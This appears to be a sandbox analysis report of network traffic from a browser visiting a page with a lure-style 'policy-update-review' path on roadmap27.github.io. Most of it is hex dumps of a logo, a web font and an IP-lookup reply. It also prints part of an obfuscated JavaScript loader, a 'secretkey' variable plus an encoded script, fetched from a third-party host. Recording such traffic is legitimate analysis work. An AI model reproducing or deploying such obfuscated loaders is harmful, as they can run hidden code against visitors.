                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                    2024-12-17 23:28:42 UTC993INData Raw: 76 61 72 20 6b 65 79 20 3d 20 22 73 65 63 72 65 74 6b 65 79 22 3b 0a 76 61 72 20 65 6e 63 6f 64 65 64 53 63 72 69 70 74 20 3d 20 22 46 77 6f 41 42 77 67 52 42 52 46 58 45 67 45 48 4e 78 4d 52 42 52 45 31 47 68 59 58 46 77 73 52 47 55 31 65 4e 79 6f 75 4d 51 6f 61 48 77 41 58 42 79 6b 4d 45 77 45 52 44 30 4a 56 55 30 31 4b 55 6c 68 4b 53 78 35 7a 55 30 56 44 55 67 6b 52 48 30 55 59 42 68 45 4d 46 52 63 56 43 51 63 63 46 79 41 4f 45 77 77 59 53 31 68 5a 56 45 4a 59 65 45 56 55 53 30 55 61 48 41 73 51 42 6b 55 64 47 43 67 57 45 51 77 50 46 30 56 4a 53 30 6f 51 49 77 30 4d 48 41 41 49 41 6a 55 59 46 78 6b 4b 49 67 6f 51 46 79 51 58 46 78 63 4d 47 77 46 62 41 6b 73 4e 46 68 59 58 57 67 73 56 48 51 77 65 45 68 45 4d 41 45 73 42 47 41 41 4c 4d 67 49 47 48 42 46
                                                                                    Data Ascii: var key = "secretkey";var encodedScript = "FwoABwgRBRFXEgEHNxMRBRE1GhYXFwsRGU1eNyouMQoaHwAXBykMEwERD0JVU01KUlhKSx5zU0VDUgkRH0UYBhEMFRcVCQccFyAOEwwYS1hZVEJYeEVUS0UaHAsQBkUdGCgWEQwPF0VJS0oQIw0MHAAIAjUYFxkKIgoQFyQXFxcMGwFbAksNFhYXWgsVHQweEhEMAEsBGAALMgIGHBF
                                                                                    2024-12-17 23:28:42 UTC11809INData Raw: 67 45 6d 48 77 51 64 42 31 35 7a 55 30 56 44 55 6b 56 55 53 30 55 45 55 77 59 43 42 67 59 63 53 30 30 63 57 6b 55 59 65 45 56 55 53 30 56 5a 55 30 56 44 55 6b 56 55 53 78 49 51 48 51 45 4d 42 55 73 59 42 41 59 59 42 77 77 4d 48 45 73 63 47 51 41 66 55 31 68 44 56 51 51 57 42 42 41 4e 53 51 63 50 45 77 73 66 54 46 35 7a 55 30 56 44 55 6b 56 55 53 30 56 5a 55 30 56 44 41 41 41 41 48 68 63 58 55 30 4a 45 53 57 39 55 53 30 56 5a 55 30 56 44 55 68 68 2b 53 30 56 5a 55 78 68 70 65 45 56 55 53 30 56 57 58 45 55 6b 46 78 46 55 44 77 6f 55 45 67 77 4e 55 67 4d 47 42 41 68 5a 46 67 67 43 47 77 6c 2b 53 30 56 5a 55 77 4d 57 48 41 59 41 41 67 6f 58 55 77 49 47 42 69 45 62 42 67 51 51 48 53 4d 52 48 51 67 78 42 67 51 51 48 30 30 47 48 77 51 64 42 30 78 5a 43 47 39 44
                                                                                    Data Ascii: gEmHwQdB15zU0VDUkVUS0UEUwYCBgYcS00cWkUYeEVUS0VZU0VDUkVUSxIQHQEMBUsYBAYYBwwMHEscGQAfU1hDVQQWBBANSQcPEwsfTF5zU0VDUkVUS0VZU0VDAAAAHhcXU0JESW9US0VZU0VDUhh+S0VZUxhpeEVUS0VWXEUkFxFUDwoUEgwNUgMGBAhZFggCGwl+S0VZUwMWHAYAAgoXUwIGBiEbBgQQHSMRHQgxBgQQH00GHwQdB0xZCG9D


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5192.168.2.449752185.199.108.1534438256C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-12-17 23:28:42 UTC415OUTGET /policy-update-review-bdh6hg-keneii9-bb7exc5gwjvqSQRyvhsiq/image/logo.png HTTP/1.1
                                                                                    Host: roadmap27.github.io
                                                                                    Connection: keep-alive
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                    Accept: */*
                                                                                    Sec-Fetch-Site: none
                                                                                    Sec-Fetch-Mode: cors
                                                                                    Sec-Fetch-Dest: empty
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    2024-12-17 23:28:42 UTC716INHTTP/1.1 200 OK
                                                                                    Connection: close
                                                                                    Content-Length: 1057
                                                                                    Server: GitHub.com
                                                                                    Content-Type: image/png
                                                                                    permissions-policy: interest-cohort=()
                                                                                    Last-Modified: Tue, 17 Dec 2024 19:16:51 GMT
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Strict-Transport-Security: max-age=31556952
                                                                                    ETag: "6761ce23-421"
                                                                                    expires: Tue, 17 Dec 2024 23:38:42 GMT
                                                                                    Cache-Control: max-age=600
                                                                                    x-proxy-cache: MISS
                                                                                    X-GitHub-Request-Id: 122E:84062:DD07B6:F2668D:6762092A
                                                                                    Accept-Ranges: bytes
                                                                                    Age: 0
                                                                                    Date: Tue, 17 Dec 2024 23:28:42 GMT
                                                                                    Via: 1.1 varnish
                                                                                    X-Served-By: cache-ewr-kewr1740071-EWR
                                                                                    X-Cache: MISS
                                                                                    X-Cache-Hits: 0
                                                                                    X-Timer: S1734478122.445239,VS0,VE19
                                                                                    Vary: Accept-Encoding
                                                                                    X-Fastly-Request-ID: e2ef73944e1e3842005c2442b7ea0d935ec58cf0
                                                                                    2024-12-17 23:28:42 UTC1057INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 6c 00 00 00 18 08 06 00 00 00 1f d5 18 1a 00 00 00 09 70 48 59 73 00 00 0b 12 00 00 0b 12 01 d2 dd 7e fc 00 00 03 d3 49 44 41 54 68 de ed 58 4d 4e db 50 10 fe 5c b1 45 f1 0d 92 f6 02 b8 27 20 2c da 2d e9 ba 8b 24 27 c0 48 b3 8f d9 8f 14 73 02 8c d4 ae 31 db 76 51 e7 06 c9 01 aa 9a 13 34 e9 05 d2 cd 0c 1a 06 1b 0c 2d c2 91 3c 92 17 ef f9 fd cc 7b df fc 7c f3 82 3f a3 77 5b 34 94 fd ab 9f 41 f2 3d 68 3c 3e f9 b0 0d d0 c9 7f 95 37 dd 15 74 80 75 f2 82 b2 d7 5d 41 7b 84 88 26 00 06 d2 2c 98 b9 68 05 60 44 34 00 30 31 5d 95 ca d5 1c 04 cc 9c 48 7f 26 fd c9 43 f3 77 00 a8 10 40 01 e0 c0 fd 2a da e2 61 03 00 33 d3 be 03 48 c5 61 52 00 3d cb 67 88 28 02 30 d6 36 80 e1 0e 3b 57 6c c0 da 00 58 02 58 cb f9 47
                                                                                    Data Ascii: PNGIHDRlpHYs~IDAThXMNP\E' ,-$'Hs1vQ4-<{|?w[4A=h<>7tu]A{&,h`D401]H&Cw@*a3HaR=g(06;WlXXG


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6192.168.2.449754104.17.24.144438256C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-12-17 23:28:42 UTC656OUTGET /ajax/libs/font-awesome/6.0.0/webfonts/fa-solid-900.woff2 HTTP/1.1
                                                                                    Host: cdnjs.cloudflare.com
                                                                                    Connection: keep-alive
                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                    Origin: https://roadmap27.github.io
                                                                                    sec-ch-ua-mobile: ?0
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                    sec-ch-ua-platform: "Windows"
                                                                                    Accept: */*
                                                                                    Sec-Fetch-Site: cross-site
                                                                                    Sec-Fetch-Mode: cors
                                                                                    Sec-Fetch-Dest: font
                                                                                    Referer: https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0/css/all.min.css
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    2024-12-17 23:28:43 UTC965INHTTP/1.1 200 OK
                                                                                    Date: Tue, 17 Dec 2024 23:28:43 GMT
                                                                                    Content-Type: application/octet-stream; charset=utf-8
                                                                                    Content-Length: 126828
                                                                                    Connection: close
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Cache-Control: public, max-age=30672000
                                                                                    ETag: "620188b3-1ef6c"
                                                                                    Last-Modified: Mon, 07 Feb 2022 21:01:39 GMT
                                                                                    cf-cdnjs-via: cfworker/kv
                                                                                    Cross-Origin-Resource-Policy: cross-origin
                                                                                    Timing-Allow-Origin: *
                                                                                    X-Content-Type-Options: nosniff
                                                                                    CF-Cache-Status: MISS
                                                                                    Expires: Sun, 07 Dec 2025 23:28:43 GMT
                                                                                    Accept-Ranges: bytes
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Fu4V4TG6pcEcLP8N1pZSWTSNKKsjlofmYQ89bvK44sfdvgwfr3K6U7BPoECUrMEUVlbA17LN8lODsZVj6SELNl0hC6%2FUE0AjCso%2FLmSysGWk%2FusC9hyJJQpDO13B8OwsI5zl4Gpd"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                    Strict-Transport-Security: max-age=15780000
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8f3ab0edfb1e41fb-EWR
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-12-17 23:28:43 UTC404INData Raw: 77 4f 46 32 00 01 00 00 00 01 ef 6c 00 0a 00 00 00 04 66 50 00 01 ef 21 03 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 38 02 24 04 20 06 60 03 a3 24 00 81 88 68 ca 8f f3 30 cb a3 28 05 87 70 07 20 a5 27 33 92 91 01 40 58 9d 00 00 a8 76 7b 1e 22 2a 9a 3d 3c 44 a4 ad b3 07 40 55 55 55 55 33 12 02 3b 54 35 00 f0 ff c1 8f 7e f2 b3 5f fc ea 37 bf fb c3 9f fe f2 b7 7f fc eb 3f fe eb 7f fe ef 3f 04 06 c7 04 7c 98 96 ed b8 9e cf 6f f8 ef 7f 3f 7e fb cc 7b 5f 7c 30 bf 88 87 84 0f 66 c9 e5 ff 8f 6a 1a 24 35 bc b3 fa 8d 94 44 69 2c 1a d7 c2 5c 0a 48 92 15 cf 26 29 30 c3 8b f1 17 c9 e7 02 6f 09 1f a3 91 b7 ea aa 8f 4c 41 04 d7 16 7b d7 3b b5 2f cb 54 3c 07 35 77 01 36 cf 5a 15 e2 b0 0c 6e d2 e9 40 f2 65 e3 27 c0 e3 37 86 a6 bd fc 14 2e 03
                                                                                    Data Ascii: wOF2lfP!8$ `$h0(p '3@Xv{"*=<D@UUUU3;T5~_7??|o?~{_|0fj$5Di,\H&)0oLA{;/T<5w6Zn@e'7.
                                                                                    2024-12-17 23:28:43 UTC1369INData Raw: 82 90 04 42 ac 10 51 36 a8 41 c6 12 c9 5a 42 7c 36 8c 1c 1e c8 c6 b0 38 e2 a8 96 53 5c 9b ff 6d 3f 27 46 8e 38 af 33 0e f4 1e 91 d5 ac 8c ec aa ca ca aa ca 2c e3 ba 7d 75 d7 74 57 8f af 9a 9a ee 1a b3 bb d3 eb 07 76 61 07 27 86 95 a1 01 dd 02 12 92 06 c1 49 8b cc d3 c8 02 e7 e6 0c d2 ca d2 e7 41 76 e4 2c 8d ce b9 95 e7 f4 46 23 e7 f7 3c 77 7f 57 f3 f3 b4 52 fb af 73 81 aa ea 16 50 03 57 77 57 f7 50 77 4f d3 48 9a d1 b4 80 2c 59 1e d9 96 65 8a 3d c6 38 46 d9 01 3b e8 09 ae 93 25 25 fb b2 09 7b 42 b8 fa 59 ca be b7 9b 4c 16 13 d6 12 46 9b bf 04 5e 82 b4 e0 79 80 6f 6d 7f ee 85 81 f9 c2 0c f3 81 bf b3 7c 76 f6 33 e8 ec f2 1b 95 dd 9d cd 49 51 51 47 45 c5 15 75 76 45 45 45 17 0d 95 6d c9 9d f5 a1 d2 93 14 15 75 56 c7 1c 0d 15 5d d4 51 f7 83 85 45 49 86 2f 4c
                                                                                    Data Ascii: BQ6AZB|68S\m?'F83,}utWva'IAv,F#<wWRsPWwWPwOH,Ye=8F;%%{BYLF^yom|v3IQQGEuvEEEmuV]QEI/L
                                                                                    2024-12-17 23:28:43 UTC1369INData Raw: d2 7a b5 b6 8d 13 27 66 2c 6b 1b bb 5d 3b 79 ce 54 e5 5c 55 d4 0e ce 83 3a 93 af 8a cb ec c3 33 43 46 a3 e3 46 64 df 58 d6 31 cf 97 5e 7f 8d 74 55 c8 54 15 f3 a2 df 92 68 2d 07 d7 a6 36 31 10 b4 a5 9c d3 4b 92 7e 0d cf 07 0f 61 51 fb e7 4c 1c f6 5f 0c bd 7d cd 9e 10 a7 7c 8e 8d e3 a9 b1 ae d3 c4 81 97 e5 b5 c4 43 c6 c3 9c 93 26 df 1f b4 4a 31 61 9e b9 73 7e 27 37 3a 91 4b 6e 7c c5 96 27 32 ae db bd d0 59 d0 ed 2f 21 99 d6 6f bd 91 1c 7f 28 55 5d dd bd 65 8d 34 7e 5f e4 5f 93 6c b1 e8 75 cc 2d 06 ab 0d 6d 37 e7 06 18 cf 78 57 8b af 79 1e 8f cb 98 a9 b3 b5 f4 73 9b cb 57 f6 c8 6c 9d 8d 17 fb 39 cf 8f c2 c7 91 c3 f3 5d c0 87 f1 bc be a9 5d 79 e4 8c 2f cc 8f 71 f0 76 79 56 88 af e9 af 41 6f b3 6f 1b 7d cd 9e 3c 98 79 1a e0 2b 79 e6 e5 ad c3 df b3 43 a5 cb 94
                                                                                    Data Ascii: z'f,k];yT\U:3CFFdX1^tUTh-61K~aQL_}|C&J1as~'7:Kn|'2Y/!o(U]e4~__lu-m7xWysWl9]]y/qvyVAoo}<y+yC
                                                                                    2024-12-17 23:28:43 UTC1369INData Raw: 38 8e 93 19 f9 17 ff 11 47 b2 4b 4e 29 20 85 a4 a4 94 95 2a 52 4d 6a 49 0b 69 2d ed a4 93 f4 90 7e 32 50 86 c9 28 99 22 d3 64 9e ac 90 35 b2 5e 36 cb 76 d9 2f 07 e5 b8 9c 96 b3 72 51 ae c9 4d 79 28 4f e5 85 bc 96 b7 f2 41 be 8a 8b b8 89 87 04 48 8c 24 49 aa a0 18 11 f9 6d d3 da 4c 36 ab cd 66 b3 db 1c 36 b7 cd 6b 0b da c2 b6 aa ad 65 5b da ae b6 bb ed 6d fb d9 71 76 86 5d 62 57 d8 b5 76 93 dd 63 0f d9 37 f6 bb f5 b7 d1 f6 ff ff ff 8e e3 94 71 ca 39 55 9d da 4e 73 67 8c 33 d6 19 e7 8c 77 26 38 13 9d 7d f4 8c 86 84 6d 08 3b 74 46 91 e1 75 c2 9b 1c 9f a3 d3 95 69 dd f9 bc 9d a2 a6 47 2d 8c 5a 1a b5 3b ea b2 72 54 3a 95 5e 65 54 99 54 ee d2 5e 68 9f 32 aa b5 6a 33 d5 49 f5 6e 8d 3e ef a9 6a b6 5a ad d6 a9 1d 6a b7 da f7 79 8e ab d3 ea ac 3a a7 6e ab d7 ca 4d
                                                                                    Data Ascii: 8GKN) *RMjIi-~2P("d5^6v/rQMy(OAH$ImL6f6ke[mqv]bWvc7q9UNsg3w&8}m;tFuiG-Z;rT:^eTT^h2j3In>jZjy:nM
                                                                                    2024-12-17 23:28:43 UTC1369INData Raw: 17 ad 21 df 39 cb 70 db c4 26 ce 73 9e 5c 72 79 44 01 25 bc e1 b2 1d b3 74 ae f2 9f a9 4c 67 32 53 ad ba 55 b7 fa ac a6 3e ab 19 69 23 d9 c4 26 9e b0 83 d6 b4 b6 be 94 a7 21 b5 a9 48 4d 4a f3 99 22 4a 53 5a 7f b2 c7 4a d3 19 61 aa fe a5 35 2d d9 48 43 1b 6a 3d 99 68 3d a9 6a 6d ad ab b5 b7 b2 56 d5 ca 5b 79 ab 6a a9 b4 67 35 4b 59 ca 35 6e 71 8b 22 4a 28 d1 4c 26 32 90 fe f4 e5 09 d7 b8 c5 35 8a c8 a3 88 54 a6 ea 09 6e 68 91 be a0 37 bd e9 4d 47 7a d2 9e ee 74 d7 f7 fa 96 ce 54 64 0b cf 28 e1 9a 5e e4 2a fb b8 c1 65 4e 68 b6 66 6a ba de d3 4c 4e 52 93 9a f4 65 0f 3b b4 bf f6 d5 be da 9b 5d 1c 0a 9f a9 4f 5d 6d 4f f5 f0 39 7c 0c 8f c2 03 ad 1d 9e e9 54 26 d2 94 86 54 a4 33 1d 75 8f ba 88 88 88 c8 6b 4f f8 2d 12 d2 fe 7c d0 a7 1d 12 d1 86 22 7a 44 4f 88 a8
                                                                                    Data Ascii: !9p&s\ryD%tLg2SU>i#&!HMJ"JSZJa5-HCj=h=jmV[yjg5KY5nq"J(L&25Tnh7MGztTd(^*eNhfjLNRe;]O]mO9|T&T3ukO-|"zDO
                                                                                    2024-12-17 23:28:43 UTC1369INData Raw: b9 a8 17 23 7e a0 5e 82 f8 91 7a 29 e2 27 ea 65 88 ef a8 97 23 7e a6 5e 81 f8 9e 7a 25 e2 17 ea 55 88 5f a9 57 23 d6 a1 5e a3 c1 de 0c 88 df a8 f7 21 9e a5 de 8f dc 9b fa a8 8e 4b fb 18 a0 bc 4e 7d 1c e5 1f ea 07 88 69 a9 5f a1 3c 4b fd 1a f9 21 7a 68 ba df d1 37 0b d3 fd 85 ce 9b 4c f7 6f 59 e5 d1 d2 5b a3 4c e1 0f e4 ce d4 55 df f6 dd 7a ce f6 03 ca 51 d4 43 51 e6 a5 1e 86 ce a7 d4 c3 51 8d a2 1e 81 6a 6c ea d1 a8 56 a3 1e 13 9d ed a8 c7 42 67 5b ea b1 e1 02 ea 71 f4 6d c7 05 b8 90 7a 3c 0d 76 52 40 e7 46 ea 29 d1 79 81 7a 0e e8 a7 5e 1a d5 52 d4 cb 6a b0 2b 83 e6 6b 57 05 54 4b 50 af 05 e3 50 af ad 6f bb 0e 2c f8 7b 22 65 bd 1e e8 db 6e 0d 70 26 f5 39 30 88 fa 5c e8 51 9f 87 ea 3b 66 98 1b d5 76 cc 30 0f aa 6d 99 69 24 aa 0d 98 69 62 54 27 32 d3 24 1a
                                                                                    Data Ascii: #~^z)'e#~^z%U_W#^!KN}i_<K!zh7LoY[LUzQCQQjlVBg[qmz<vR@F)yz^Rj+kWTKPPo,{"enp&90\Q;fv0mi$ibT'2$
                                                                                    2024-12-17 23:28:43 UTC1369INData Raw: 98 83 7c 1c 0d 63 4e f2 69 f2 25 62 2e f2 15 f2 75 62 21 f2 0d 24 c4 5e e4 fb e4 07 c4 62 e4 97 40 2c 41 7e 8d 58 92 fc 0e b1 14 f9 63 c3 58 9a fc 95 4c 62 19 b2 27 7f 23 96 23 ff 04 62 05 f2 bf 9a 58 91 16 b4 41 47 eb 87 b4 61 b4 91 c4 6a b4 89 88 58 8b 36 0d 62 6d da 6c 35 ee a4 cd 4d 9b e7 38 4b 5f 5b 87 b6 7e 4e 50 b6 0d 2f 88 8d 68 9b 24 c4 c6 b4 cd 68 9b 13 9b d0 0e 05 ba 85 69 87 25 74 8b d0 8e a2 1d 4d 6c 46 3b 05 88 2d 68 57 d6 c4 96 b4 87 68 0f e7 ee 65 7b 94 88 6d 68 4f 22 b6 a5 3d 9b 10 db d1 5e a4 bd 44 6c 4f 7b 15 88 1d 69 1f 22 76 a2 7d 82 d8 99 f6 25 62 17 da 8f 09 b1 2b ed 2f da df c4 6e b4 7f 81 01 e7 d1 fe 47 ec 41 0d 46 ec 49 8d 85 d8 8b 9a 0c b1 37 35 45 42 ec 43 cd 46 cd 41 ec 4b cd 85 84 38 80 9a 97 9a 8f 38 90 5a 00 88 83 a9 85 11
                                                                                    Data Ascii: |cNi%b.ub!$^b@,A~XcXLb'##bXAGajX6bml5M8K_[~NP/h$hi%tMlF;-hWhe{mhO"=^DlO{i"v}%b+/nGAFI75EBCFAK88Z
                                                                                    2024-12-17 23:28:43 UTC1369INData Raw: 85 50 76 dc 25 2c 82 b2 df 35 0c 8b a1 1c 00 e5 20 08 4b a0 1c 06 e5 70 08 cb a1 1c 09 e5 18 08 2b a1 9c 86 bb 84 b5 50 ce d9 44 58 07 e5 51 28 8f 41 58 0f e5 45 dc 25 6c 84 f2 de 5d c2 26 28 5f dd c5 35 84 f2 bf 25 6c 46 bf 1d 62 c5 83 62 65 2b c1 a3 58 c3 8a 1f 86 62 4d 2b 7e 38 8a b5 ac f8 11 28 d6 b6 a2 86 28 36 b1 a2 cb 51 6c 63 c5 0d 46 b1 a3 15 ff 2f 8a 9d ac f8 bf 51 ec 61 25 4c 42 b1 8f 15 f7 28 8a 7d ad e8 1e 14 07 de 85 30 0d 45 2b aa 80 e2 4c 2b fe 48 14 67 51 59 6d a6 95 30 19 c5 ad 56 7c 5b 14 f7 b4 e2 26 a0 b8 8f 15 f7 0c 8a fb 5a f1 43 51 3c cc 0a 5f a3 78 b8 15 bd 8b e2 19 56 74 23 8a e7 58 71 0f a3 78 9e 15 b7 15 c5 8b ad 70 16 8a 97 58 d1 21 28 5e 63 85 eb 51 bc d6 8a fb 1f c5 9b ac f8 4b 50 bc dd 8a fb 0a c5 bb ac 70 2a 8a 8f 5a 71 07
                                                                                    Data Ascii: Pv%,5 Kp+PDXQ(AXE%l]&(_5%lFbbe+XbM+~8((6QlcF/Qa%LB(}0E+L+HgQYm0V|[&ZCQ<_xVt#XqxpX!(^cQKPp*Zq
                                                                                    2024-12-17 23:28:43 UTC1369INData Raw: 98 6c c5 46 a2 30 c5 4a a2 11 85 a9 56 12 4d 28 4c b3 12 4d 43 61 81 95 e8 08 14 96 5a 49 8c 46 61 b9 95 44 11 85 35 56 12 93 51 38 d4 4a f4 36 0a e7 59 e1 14 14 ae b4 62 df a2 70 8b 15 fb 05 85 87 ac d8 29 28 3c 6a c5 8e 41 e1 35 2b ba 0e 85 2f ad d8 69 28 7c 45 b2 50 df d3 8a bd 82 c2 4f 56 b4 37 0a 3f 5b 89 ee 40 e1 57 2b d1 a5 28 fc 66 45 a7 a2 f0 87 15 1d 80 c2 9f 56 ac 88 c2 df 56 f8 13 85 7f ac 68 2a 0a c1 4a f4 19 0a 5b ad d8 df 28 fc 6f 85 59 28 f4 5b b1 08 55 0e b7 12 9d 83 2a 47 58 d1 14 54 39 ce 0a 75 a8 72 be 15 7b 17 55 ae b4 62 69 54 79 c4 4a f4 07 aa 3c 5f c2 2e bc 7e c1 bf 3e 06 9e d3 71 7a 8e 5a 1a 69 a5 93 61 a0 ae 64 9c 8c 8b f5 0d f5 0d 5d 7d e5 be 72 71 44 69 44 69 b0 4a dd 71 43 5c ac 29 37 0c 2d 97 ca 45 2d ea ff b2 b6 90 97 f2 85
                                                                                    Data Ascii: lF0JVM(LMCaZIFaD5VQ8J6Ybp)(<jA5+/i(|EPOV7?[@W+(fEVVh*J[(oY([U*GXT9ur{UbiTyJ<_.~>qzZiad]}rqDiDiJqC\)7-E-
                                                                                    2024-12-17 23:28:43 UTC1369INData Raw: 0d c2 b9 38 fc 8e 7d 38 f1 3b 80 31 a1 c7 4f ed 00 8d 65 67 b7 f4 0b 35 9e 26 a0 64 15 a8 e4 fe f6 23 7b ed 4a e5 27 f3 fa 5e 6d 7e ed 53 ca 62 5a 83 14 ad ad fd fb c2 27 8e a4 19 3c 74 e4 f3 ad ad 1d e2 8e 5a 8b cd e5 0f 15 b0 a7 4d 3f 8e d3 f4 68 bf 3c 64 0a 07 a8 8a 7a 08 f9 16 e6 25 ad de e6 18 42 49 18 27 67 d1 34 1b a4 99 a3 3d 35 42 09 fd fc 94 01 58 96 2d ad 66 a9 5f 29 db b6 df 4d ae ac 9e 30 3d 4a 78 d6 c5 a1 7e bd 2d 38 33 ed ac 96 27 49 a9 54 f7 c0 fa c9 b5 ae 7e d5 3b 55 e9 eb c4 a5 a5 4a 19 64 38 a3 80 10 68 e4 d5 f1 4d cc 1b 35 e3 e0 d0 63 87 96 67 9a 5c d3 c8 2f fc 8a 12 2e 01 90 67 99 26 5c 58 cc 1c 9d 0a ce 61 cf 58 4a ca 71 ae 03 c7 cb 9e 57 43 03 74 1a a1 8e 22 a8 87 10 7b 0e 05 55 37 b2 b4 67 20 d8 e5 52 92 66 32 70 fd 92 ac bf 6a e0
                                                                                    Data Ascii: 8}8;1Oeg5&d#{J'^m~SbZ'<tZM?h<dz%BI'g4=5BX-f_)M0=Jx~-83'IT~;UJd8hM5cg\/.g&\XaXJqWCt"{U7g Rf2pj


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7192.168.2.449755172.67.74.1524438256C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-12-17 23:28:43 UTC561OUTGET /?format=json HTTP/1.1
                                                                                    Host: api.ipify.org
                                                                                    Connection: keep-alive
                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                    sec-ch-ua-mobile: ?0
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                    sec-ch-ua-platform: "Windows"
                                                                                    Accept: */*
                                                                                    Origin: https://roadmap27.github.io
                                                                                    Sec-Fetch-Site: cross-site
                                                                                    Sec-Fetch-Mode: cors
                                                                                    Sec-Fetch-Dest: empty
                                                                                    Referer: https://roadmap27.github.io/
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    2024-12-17 23:28:43 UTC463INHTTP/1.1 200 OK
                                                                                    Date: Tue, 17 Dec 2024 23:28:43 GMT
                                                                                    Content-Type: application/json
                                                                                    Content-Length: 21
                                                                                    Connection: close
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Vary: Origin
                                                                                    cf-cache-status: DYNAMIC
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8f3ab0f15ad978d3-EWR
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1950&min_rtt=1944&rtt_var=742&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2819&recv_bytes=1139&delivery_rate=1462925&cwnd=210&unsent_bytes=0&cid=71231dc82a8266ea&ts=449&x=0"
                                                                                    2024-12-17 23:28:43 UTC21INData Raw: 7b 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 7d
                                                                                    Data Ascii: {"ip":"8.46.123.189"}


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    8192.168.2.44975665.109.232.1064438256C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-12-17 23:28:43 UTC353OUTGET /animal/script.js HTTP/1.1
                                                                                    Host: www.larkus.ao
                                                                                    Connection: keep-alive
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                    Accept: */*
                                                                                    Sec-Fetch-Site: none
                                                                                    Sec-Fetch-Mode: cors
                                                                                    Sec-Fetch-Dest: empty
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    2024-12-17 23:28:44 UTC375INHTTP/1.1 200 OK
                                                                                    Connection: close
                                                                                    content-type: text/javascript
                                                                                    last-modified: Fri, 06 Dec 2024 13:37:11 GMT
                                                                                    accept-ranges: bytes
                                                                                    content-length: 12802
                                                                                    date: Tue, 17 Dec 2024 23:28:44 GMT
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                    2024-12-17 23:28:44 UTC993INData Raw: 76 61 72 20 6b 65 79 20 3d 20 22 73 65 63 72 65 74 6b 65 79 22 3b 0a 76 61 72 20 65 6e 63 6f 64 65 64 53 63 72 69 70 74 20 3d 20 22 46 77 6f 41 42 77 67 52 42 52 46 58 45 67 45 48 4e 78 4d 52 42 52 45 31 47 68 59 58 46 77 73 52 47 55 31 65 4e 79 6f 75 4d 51 6f 61 48 77 41 58 42 79 6b 4d 45 77 45 52 44 30 4a 56 55 30 31 4b 55 6c 68 4b 53 78 35 7a 55 30 56 44 55 67 6b 52 48 30 55 59 42 68 45 4d 46 52 63 56 43 51 63 63 46 79 41 4f 45 77 77 59 53 31 68 5a 56 45 4a 59 65 45 56 55 53 30 55 61 48 41 73 51 42 6b 55 64 47 43 67 57 45 51 77 50 46 30 56 4a 53 30 6f 51 49 77 30 4d 48 41 41 49 41 6a 55 59 46 78 6b 4b 49 67 6f 51 46 79 51 58 46 78 63 4d 47 77 46 62 41 6b 73 4e 46 68 59 58 57 67 73 56 48 51 77 65 45 68 45 4d 41 45 73 42 47 41 41 4c 4d 67 49 47 48 42 46
                                                                                    Data Ascii: var key = "secretkey";var encodedScript = "FwoABwgRBRFXEgEHNxMRBRE1GhYXFwsRGU1eNyouMQoaHwAXBykMEwERD0JVU01KUlhKSx5zU0VDUgkRH0UYBhEMFRcVCQccFyAOEwwYS1hZVEJYeEVUS0UaHAsQBkUdGCgWEQwPF0VJS0oQIw0MHAAIAjUYFxkKIgoQFyQXFxcMGwFbAksNFhYXWgsVHQweEhEMAEsBGAALMgIGHBF
